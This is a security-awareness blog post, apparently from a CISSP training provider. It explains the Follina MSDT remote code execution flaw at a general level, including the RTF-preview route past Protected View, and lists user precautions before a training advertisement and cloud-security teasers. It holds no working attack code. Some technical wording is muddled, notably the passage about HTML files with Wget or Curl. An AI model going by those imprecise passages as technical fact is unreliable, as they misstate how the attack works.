Microsoft disclosed a Remote Code Execution (RCE) flaw in the Microsoft Support Diagnostic Tool (MSDT), which allows an attacker to exploit “Follina” by sending a URL to a vulnerable workstation. Successful exploitation allows the hacker to install software, read or alter data, and create new accounts using the user rights of the victim.
The Follina vulnerability is dangerous due to its ease of exploitation and execution: all that is necessary to exploit it is an Office or RTF file containing a hyperlink to a site that distributes the viral payload.
Office documents are currently only one of the numerous available entry points. It is possible to open a malicious document using the Windows Diagnostic Engine after loading an HTML file with web scripting commands such as Wget or Curl.
Returning to the infected document (which affects a bigger audience), the operation is quite ingenious. Either when the file is opened or when Windows Explorer previews it, the virus load included in the file is executed.
According to Microsoft, this vulnerability has been exploited in the wild and might allow an unauthenticated, remote attacker to take control of a susceptible system. The proof-of-concept code for the Follina vulnerability is available online and is incorporated into typical exploitation frameworks and tools.
Microsoft has stated that Protected View will protect users from these attacks, despite the fact that no remedy has been offered. Researchers observed that Protected View is overcome if the hacker provides the vulnerability as an RTF file and the preview of the file is seen in Explorer.
Microsoft and the cybersecurity community have devised workarounds and mitigation strategies despite the absence of official upgrades. Although security companies have enhanced their solutions to detect attacks, additional exploitation attempts are expected as more vulnerability information and proof-of-concept exploits become widely known.
The exploit is compatible with Office Pro Plus, Office 2013, Office 2016, Office 2019, and Office 2021, but there is evidence that Microsoft was working on a solution prior to its release. Numerous files that exploit the Follina Vulnerability have been discovered in the wild. Exploitation appears to have begun in April, with users in India and Russia being targeted by extortion and interview requests.
Users should consistently observe the following:
1. Never open a file sent by an unknown sender.
2. Unless absolutely necessary, do not disable protected mode for documents downloaded from the internet or via email.
3. Do not open.rtf files downloaded from the internet, not even in preview mode.
Sign up for CISSP Training immediately.
Call +1 416-471-4545,
Email: info@cybercert.ca
Lead Instructor qualified in CISSP, CCIE, and MCT with 25 years of training experience in Toronto.
In the modern age of technology, cloud computing has become a popular solution for businesses to store and access their data remotely. However, the convenience of cloud computing also presents risks for data security. Therefore, cloud encryption and key management are important aspects of data protection. Cloud Encryption: Encryption is the process of converting plain […]
Read MoreCloud computing has transformed the IT industry by providing a scalable, flexible, and cost-effective way of delivering computing resources, including servers, storage, and applications, over the internet. The cloud has revolutionized the way businesses operate, allowing them to focus on their core competencies while leaving complex IT infrastructure management to cloud providers. This blog will […]
Read MoreCloud computing has revolutionized the way businesses operate by providing a scalable and flexible computing infrastructure that can be accessed from anywhere in the world. However, as more companies adopt cloud computing, security has become a major concern. Security in cloud computing refers to the protection of data, applications, and infrastructure from unauthorized access, theft, […]
Read More